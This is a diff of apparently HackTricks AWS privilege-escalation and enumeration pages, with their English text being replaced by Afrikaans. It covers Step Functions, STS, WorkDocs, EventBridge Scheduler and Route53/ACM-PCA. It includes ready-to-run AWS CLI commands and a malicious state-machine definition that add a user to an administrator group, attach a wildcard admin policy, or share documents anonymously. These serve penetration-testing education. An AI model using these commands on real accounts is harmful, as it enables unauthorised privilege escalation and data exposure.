arn:aws:iam::123456789012:role/PermissiveRole { - "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine", - "creationDate": "2024-07-09T20:29:35.381000+02:00" +"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine", +"creationDate": "2024-07-09T20:29:35.381000+02:00" } ``` - -- **Command** executed to **start an execution** of the previously created state machine: - +- **Opdrag** uitgevoer om **'n uitvoering** van die voorheen geskepte toestandmasjien te **begin**: ```json aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine { - "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "startDate": "2024-07-09T20:33:35.466000+02:00" +"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"startDate": "2024-07-09T20:33:35.466000+02:00" } ``` - > [!WARNING] -> The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account. +> Die deur die aanvaller beheerde S3-bucket moet toestemmings hĂȘ om 'n s3:PutObject aksie van die slagoffer rekening te aanvaar. -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**PotensiĂ«le Impak**: Ongeoorloofde uitvoering en manipulasie van werksvloei en toegang tot sensitiewe hulpbronne, wat moontlik kan lei tot beduidende sekuriteitsbreuke. -### `states:UpdateStateMachine` & (not always required) `iam:PassRole` +### `states:UpdateStateMachine` & (nie altyd vereis nie) `iam:PassRole` -An attacker with the **`states:UpdateStateMachine`** permission would be able to modify the definition of an state machine, being able to add extra stealthy states that could end in a privilege escalation. 
This way, when a legitimate user starts an execution of the state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. +'n Aanvaller met die **`states:UpdateStateMachine`** toestemming sal in staat wees om die definisie van 'n toestandsmasjien te wysig, en kan ekstra stealthy toestande byvoeg wat kan eindig in 'n privilige-escalasie. Op hierdie manier, wanneer 'n wettige gebruiker 'n uitvoering van die toestandsmasjien begin, sal hierdie nuwe kwaadwillige stealth toestand uitgevoer word en die privilige-escalasie sal suksesvol wees. -Depending on how permissive is the IAM Role associated to the state machine is, an attacker would face 2 situations: - -1. **Permissive IAM Role**: If the IAM Role associated to the state machine is already permissive (it has for example the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached), then the **`iam:PassRole`** permission would not be required in order to escalate privileges since it would not be necessary to also update the IAM Role, with the state machine definition is enough. -2. **Not permissive IAM Role**: In contrast with the previous case, here an attacker would also require the **`iam:PassRole`** permission since it would be necessary to associate a permissive IAM Role to the state machine in addition to modify the state machine definition. +Afhangende van hoe permissief die IAM Rol geassosieer met die toestandsmasjien is, sal 'n aanvaller 2 situasies in die gesig staar: +1. **Permissiewe IAM Rol**: As die IAM Rol geassosieer met die toestandsmasjien reeds permissief is (dit het byvoorbeeld die **`arn:aws:iam::aws:policy/AdministratorAccess`** beleid aangeheg), dan sal die **`iam:PassRole`** toestemming nie vereis word om privilige te eskaleer nie, aangesien dit nie nodig sal wees om ook die IAM Rol op te dateer nie, met die toestandsmasjien definisie is genoeg. +2. 
**Nie permissiewe IAM Rol**: In teenstelling met die vorige geval, hier sal 'n aanvaller ook die **`iam:PassRole`** toestemming benodig aangesien dit nodig sal wees om 'n permissiewe IAM Rol aan die toestandsmasjien te assosieer benewens om die toestandsmasjien definisie te wysig. ```bash aws states update-state-machine --state-machine-arn [--definition ] [--role-arn ] [--logging-configuration ] \ [--tracing-configuration ] [--publish | --no-publish] [--version-description ] ``` - -The following examples show how to update a legit state machine that just invokes a HelloWorld Lambda function, in order to add an extra state that adds the user **`unprivilegedUser`** to the **`administrator`** IAM Group. This way, when a legitimate user starts an execution of the updated state machine, this new malicious stealth state will be executed and the privilege escalation will be successful. +Die volgende voorbeelde wys hoe om 'n wettige toestandsmasjien op te dateer wat net 'n HelloWorld Lambda-funksie aanroep, om 'n ekstra toestand by te voeg wat die gebruiker **`unprivilegedUser`** by die **`administrator`** IAM-groep voeg. Op hierdie manier, wanneer 'n wettige gebruiker 'n uitvoering van die opgedateerde toestandsmasjien begin, sal hierdie nuwe kwaadwillige stealth-toestand uitgevoer word en die privilige-escalasie sal suksesvol wees. > [!WARNING] -> If the state machine does not have a permissive IAM Role associated, it would also be required the **`iam:PassRole`** permission to update the IAM Role in order to associate a permissive IAM Role (for example one with the **`arn:aws:iam::aws:policy/AdministratorAccess`** policy attached). +> As die toestandsmasjien nie 'n toelaatbare IAM-rol geassosieer het nie, sal dit ook vereis word dat die **`iam:PassRole`** toestemming gegee word om die IAM-rol op te dateer ten einde 'n toelaatbare IAM-rol te assosieer (byvoorbeeld een met die **`arn:aws:iam::aws:policy/AdministratorAccess`** beleid aangeheg). 
{{#tabs }} {{#tab name="Legit State Machine" }} - ```json { - "Comment": "Hello world from Lambda state machine", - "StartAt": "Start PassState", - "States": { - "Start PassState": { - "Type": "Pass", - "Next": "LambdaInvoke" - }, - "LambdaInvoke": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" - }, - "Next": "End PassState" - }, - "End PassState": { - "Type": "Pass", - "End": true - } - } +"Comment": "Hello world from Lambda state machine", +"StartAt": "Start PassState", +"States": { +"Start PassState": { +"Type": "Pass", +"Next": "LambdaInvoke" +}, +"LambdaInvoke": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" +}, +"Next": "End PassState" +}, +"End PassState": { +"Type": "Pass", +"End": true +} +} } ``` - {{#endtab }} -{{#tab name="Malicious Updated State Machine" }} - +{{#tab name="Kwaadwillige Opgedateerde Toestandmasjien" }} ```json { - "Comment": "Hello world from Lambda state machine", - "StartAt": "Start PassState", - "States": { - "Start PassState": { - "Type": "Pass", - "Next": "LambdaInvoke" - }, - "LambdaInvoke": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" - }, - "Next": "AddUserToGroup" - }, - "AddUserToGroup": { - "Type": "Task", - "Parameters": { - "GroupName": "administrator", - "UserName": "unprivilegedUser" - }, - "Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup", - "Next": "End PassState" - }, - "End PassState": { - "Type": "Pass", - "End": true - } - } +"Comment": "Hello world from Lambda state machine", +"StartAt": "Start PassState", +"States": { +"Start PassState": { +"Type": "Pass", +"Next": "LambdaInvoke" +}, +"LambdaInvoke": { +"Type": "Task", 
+"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST" +}, +"Next": "AddUserToGroup" +}, +"AddUserToGroup": { +"Type": "Task", +"Parameters": { +"GroupName": "administrator", +"UserName": "unprivilegedUser" +}, +"Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup", +"Next": "End PassState" +}, +"End PassState": { +"Type": "Pass", +"End": true +} +} } ``` - {{#endtab }} {{#endtabs }} -- **Command** executed to **update** **the legit state machine**: - +- **Opdrag** uitgevoer om **die regte toestand masjien** te **opdateer**: ```bash aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json { - "updateDate": "2024-07-10T20:07:10.294000+02:00", - "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +"updateDate": "2024-07-10T20:07:10.294000+02:00", +"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` - -**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches. +**PotensiĂ«le Impak**: Onbevoegde uitvoering en manipulasie van werksvloeie en toegang tot sensitiewe hulpbronne, wat moontlik kan lei tot beduidende sekuriteitsbreuke. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md index 782bcc237..80f3df177 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md 
@@ -6,121 +6,101 @@ ### `sts:AssumeRole` -Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). - -For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. +Elke rol word geskep met 'n **rol vertrouensbeleid**, hierdie beleid dui aan **wie die geskepte rol kan aanvaar**. As 'n rol van die **dieselfde rekening** sĂȘ dat 'n rekening dit kan aanvaar, beteken dit dat die rekening toegang tot die rol sal hĂȘ (en moontlik **privesc**). +Byvoorbeeld, die volgende rol vertrouensbeleid dui aan dat enigiemand dit kan aanvaar, daarom **sal enige gebruiker in staat wees om privesc** na die toestemmings wat met daardie rol geassosieer word. ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "sts:AssumeRole" +} +] } ``` - -You can impersonate a role running: - +U kan 'n rol naboots deur te loop: ```bash aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname ``` - -**Potential Impact:** Privesc to the role. +**PotensiĂ«le Impak:** Privesc na die rol. > [!CAUTION] -> Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ -> With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. 
+> Let daarop dat in hierdie geval die toestemming `sts:AssumeRole` **aangedui moet word in die rol om te misbruik** en nie in 'n beleid wat aan die aanvaller behoort nie.\ +> Met een uitsondering, om 'n **rol van 'n ander rekening** te **aanneem**, moet die aanvaller rekening **ook** die **`sts:AssumeRole`** oor die rol hĂȘ. ### **`sts:GetFederationToken`** -With this permission it's possible to generate credentials to impersonate any user: - +Met hierdie toestemming is dit moontlik om akrediteer te genereer om enige gebruiker na te boots: ```bash aws sts get-federation-token --name ``` - -This is how this permission can be given securely without giving access to impersonate other users: - +Dit is hoe hierdie toestemming veilig gegee kan word sonder om toegang te gee om ander gebruikers na te volg: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "VisualEditor0", - "Effect": "Allow", - "Action": "sts:GetFederationToken", - "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "VisualEditor0", +"Effect": "Allow", +"Action": "sts:GetFederationToken", +"Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" +} +] } ``` - ### `sts:AssumeRoleWithSAML` -A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** - -An example of a trust policy with this permission is: +'n Vertrouensbeleid met hierdie rol verleen **gebruikers wat via SAML geverifieer is toegang om die rol na te volg.** +'n Voorbeeld van 'n vertrouensbeleid met hierdie toestemming is: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "OneLogin", - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" - }, - "Action": "sts:AssumeRoleWithSAML", - "Condition": { - "StringEquals": { - "SAML:aud": "https://signin.aws.amazon.com/saml" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ 
+"Sid": "OneLogin", +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" +}, +"Action": "sts:AssumeRoleWithSAML", +"Condition": { +"StringEquals": { +"SAML:aud": "https://signin.aws.amazon.com/saml" +} +} +} +] } ``` - -To generate credentials to impersonate the role in general you could use something like: - +Om geloofsbriewe te genereer om die rol te verteenwoordig, kan jy iets soos gebruik: ```bash aws sts assume-role-with-saml --role-arn --principal-arn ``` - -But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): - +Maar **verskaffers** mag hul **eie gereedskap** hĂȘ om dit makliker te maak, soos [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): ```bash onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 ``` - -**Potential Impact:** Privesc to the role. +**PotensiĂ«le Impak:** Privesc na die rol. ### `sts:AssumeRoleWithWebIdentity` -This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. [Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) - -For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: +Hierdie toestemming gee toestemming om 'n stel tydelike sekuriteitsbewyse te verkry vir **gebruikers wat in 'n mobiele, webtoepassing, EKS...** geverifieer is met 'n webidentiteitsverskaffer. 
[Leer meer hier.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) +Byvoorbeeld, as 'n **EKS-diensrekening** in staat moet wees om **'n IAM-rol na te volg**, sal dit 'n token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** hĂȘ en kan dit **die rol aanvaar en bewys verkry** deur iets soos: ```bash aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token # The role name can be found in the metadata of the configuration of the pod ``` - -### Federation Abuse +### Federasie Misbruik {{#ref}} ../aws-basic-information/aws-federation-abuse.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md index 4b1e5e7e9..53b709c31 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md @@ -2,7 +2,7 @@ ## WorkDocs -For more info about WorkDocs check: +Vir meer inligting oor WorkDocs, kyk: {{#ref}} ../aws-services/aws-directory-services-workdocs-enum.md 
@@ -10,17 +10,14 @@ For more info about WorkDocs check: ### `workdocs:CreateUser` -Create a user inside the Directory indicated, then you will have access to both WorkDocs and AD: - +Skep 'n gebruiker binne die aangeduide Directory, dan sal jy toegang hĂȘ tot beide WorkDocs en AD: ```bash # Create user (created inside the AD) aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password --email-address name@directory.domain --organization-id ``` - ### `workdocs:GetDocument`, `(workdocs:`DescribeActivities`)` -The files might contain sensitive information, read them: - +Die lĂȘers mag sensitiewe inligting bevat, lees hulle: ```bash # Get what was created in the directory aws workdocs describe-activities --organization-id 
@@ -31,26 +28,19 @@ aws workdocs describe-activities --user-id "S-1-5-21-377..." # Get file (a url to access with the content will be retreived) aws workdocs get-document --document-id ``` - ### `workdocs:AddResourcePermissions` -If you don't have access to read something, you can just grant it - +As jy nie toegang het om iets te lees nie, kan jy dit eenvoudig toeken. ```bash # Add permission so anyway can see the file aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` - ### `workdocs:AddUserToGroup` -You can make a user admin by setting it in the group ZOCALO_ADMIN.\ -For that follow the instructions from [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) - -Login with that user in workdoc and access the admin panel in `/workdocs/index.html#/admin` - -I didn't find any way to do this from the cli. - - +Jy kan 'n gebruiker admin maak deur dit in die groep ZOCALO_ADMIN te stel.\ +Volg die instruksies van [https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html](https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html) +Teken in met daardie gebruiker in workdoc en toegang die admin paneel in `/workdocs/index.html#/admin` +Ek het nie enige manier gevind om dit vanaf die cli te doen nie. diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md index 1519df70f..f9a9cd7a8 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md 
@@ -4,7 +4,7 @@ ## EventBridge Scheduler -More info EventBridge Scheduler in: +Meer inligting oor EventBridge Scheduler in: {{#ref}} ../aws-services/eventbridgescheduler-enum.md 
@@ -12,42 +12,34 @@ More info EventBridge Scheduler in: ### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) -An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action - -For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: +'n Aanvaller met daardie toestemmings sal in staat wees om **`te skep`|`op te dateer` 'n skedule en die toestemmings van die skedule rol** wat daaraan geheg is, te misbruik om enige aksie uit te voer. +Byvoorbeeld, hulle kan die skedule konfigureer om **'n Lambda-funksie aan te roep** wat 'n sjabloon aksie is: ```bash aws scheduler create-schedule \ - --name MyLambdaSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:lambda:::function:", - "RoleArn": "arn:aws:iam:::role/" - }' +--name MyLambdaSchedule \ +--schedule-expression "rate(5 minutes)" \ +--flexible-time-window "Mode=OFF" \ +--target '{ +"Arn": "arn:aws:lambda:::function:", +"RoleArn": "arn:aws:iam:::role/" +}' ``` - -In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: - +In addision tot templated diens aksies, kan jy **universal targets** in EventBridge Scheduler gebruik om 'n wye reeks API operasies vir baie AWS dienste aan te roep. Universal targets bied buigsaamheid om byna enige API aan te roep. 
Een voorbeeld kan wees om universal targets te gebruik om "**AdminAccessPolicy**" toe te voeg, met 'n rol wat die "**putRolePolicy**" beleid het: ```bash aws scheduler create-schedule \ - --name GrantAdminToTargetRoleSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", - "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", - "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" - }' +--name GrantAdminToTargetRoleSchedule \ +--schedule-expression "rate(5 minutes)" \ +--flexible-time-window "Mode=OFF" \ +--target '{ +"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", +"RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", +"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" +}' ``` - -## References +## Verwysings - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md index fc3563ce7..3a588cffa 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md @@ -2,7 +2,7 @@ {{#include ../../../banners/hacktricks-training.md}} -For more information about Route53 check: +Vir meer inligting oor Route53, kyk: {{#ref}} ../aws-services/aws-route53-enum.md 
@@ -11,26 +11,22 @@ For more information about Route53 check: ### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` > [!NOTE] -> To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. +> Om hierdie aanval uit te voer, moet die teikenrekening reeds 'n [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** in die rekening opgestel hĂȘ, en EC2-instanties in die VPC(s) moet reeds die sertifikate ingevoer het om dit te vertrou. Met hierdie infrastruktuur in plek, kan die volgende aanval uitgevoer word om AWS API-verkeer te onderskep. -Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` +Ander toestemmings **aanbeveel maar nie vereis vir die enumerasie** deel: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` -Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. 
+Aneem daar is 'n AWS VPC met verskeie cloud-native toepassings wat met mekaar en met AWS API kommunikeer. Aangesien die kommunikasie tussen die mikrodiens dikwels TLS-geĂ«nkripteer is, moet daar 'n private CA wees om die geldige sertifikate vir daardie dienste uit te reik. **As ACM-PCA gebruik word** daarvoor en die teenstander daarin slaag om **toegang te verkry om beide route53 en acm-pca private CA te beheer** met die minimum stel toestemmings hierbo beskryf, kan dit **die toepassingsoproepe na AWS API oorneem** en hul IAM-toestemmings oorneem. -This is possible because: +Dit is moontlik omdat: -- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) -- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names -- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names +- AWS SDK's het nie [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) nie +- Route53 laat die skep van Private Hosted Zone en DNS-rekords vir AWS API-domeinnames toe +- Private CA in ACM-PCA kan nie beperk word tot die ondertekening van sertifikate slegs vir spesifieke Algemene Name nie -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. +**PotensiĂ«le Impak:** Indirekte privesc deur die onderskepping van sensitiewe inligting in die verkeer. -#### Exploitation +#### Exploitatie -Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) +Vind die eksploitasiestappe in die oorspronklike navorsing: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-services/README.md b/src/pentesting-cloud/aws-security/aws-services/README.md index dddd8ac04..f62b35238 100644 --- a/src/pentesting-cloud/aws-security/aws-services/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/README.md 
@@ -1,35 +1,31 @@ -# AWS - Services +# AWS - Dienste {{#include ../../../banners/hacktricks-training.md}} -## Types of services +## Tipes dienste -### Container services +### Houer dienste -Services that fall under container services have the following characteristics: +Dienste wat onder houer dienste val, het die volgende eienskappe: -- The service itself runs on **separate infrastructure instances**, such as EC2. -- **AWS** is responsible for **managing the operating system and the platform**. -- A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -- As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -- Also, platform-level identity and access management where it exists. -- **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. +- Die diens self loop op **afsonderlike infrastruktuur instansies**, soos EC2. +- **AWS** is verantwoordelik vir **die bestuur van die bedryfstelsel en die platform**. +- 'n Gemanagte diens word deur AWS verskaf, wat tipies die diens self is vir die **werklike aansoek wat as houers gesien word**. +- As 'n gebruiker van hierdie houer dienste, het jy 'n aantal bestuur en sekuriteit verantwoordelikhede, insluitend **die bestuur van netwerktoegang sekuriteit, soos netwerktoegangbeheerlys reĂ«ls en enige vuurmure**. +- Ook, platform-vlak identiteit en toegang bestuur waar dit bestaan. +- **Voorbeelde** van AWS houer dienste sluit Relational Database Service, Elastic Mapreduce, en Elastic Beanstalk in. -### Abstract Services +### Abstrakte Dienste -- These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. 
-- The services are accessed via endpoints using AWS application programming interfaces, APIs. -- The **underlying infrastructure, operating system, and platform is managed by AWS**. -- The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -- **Data is isolated via security mechanisms**. -- Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. +- Hierdie dienste is **verwyder, geabstraheer, van die platform of bestuurslaag waarop wolk aansoeke gebou is**. +- Die dienste word via eindpunte toeganklik gemaak deur gebruik te maak van AWS aansoekprogrammering interfaces, APIs. +- Die **onderliggende infrastruktuur, bedryfstelsel, en platform word deur AWS bestuur**. +- Die geabstraheerde dienste bied 'n multi-huur platform waarop die onderliggende infrastruktuur gedeel word. +- **Data is geĂŻsoleer deur middel van sekuriteitsmeganismes**. +- Abstrakte dienste het 'n sterk integrasie met IAM, en **voorbeelde** van abstrakte dienste sluit S3, DynamoDB, Amazon Glacier, en SQS in. -## Services Enumeration +## Dienste Enumerasie -**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** +**Die bladsye van hierdie afdeling is georden volgens AWS diens. Daarin sal jy inligting oor die diens (hoe dit werk en vermoĂ«ns) vind wat jou sal toelaat om voorregte te verhoog.** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md index 09aa42d7c..aa60f5255 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md 
@@ -4,40 +4,39 @@ ## API Gateway -### Basic Information +### Basiese Inligting -AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application. +AWS API Gateway is 'n omvattende diens wat deur Amazon Web Services (AWS) aangebied word, ontwerp vir ontwikkelaars om **API's op 'n groot skaal te skep, te publiseer en te bestuur**. Dit funksioneer as 'n toegangspunt tot 'n toepassing, wat ontwikkelaars toelaat om 'n raamwerk van reĂ«ls en prosedures op te stel. Hierdie raamwerk regeer die toegang wat eksterne gebruikers tot sekere data of funksies binne die toepassing het. -API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications. +API Gateway stel jou in staat om **te definieer hoe versoeke na jou API's hanteer moet word**, en dit kan pasgemaakte API-eindpunte met spesifieke metodes (bv. GET, POST, PUT, DELETE) en hulpbronne skep. Dit kan ook kliĂ«nt SDK's (Software Development Kits) genereer om dit vir ontwikkelaars makliker te maak om jou API's vanuit hul toepassings aan te roep. -### API Gateways Types +### API Gateway Tipes -- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. -- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. 
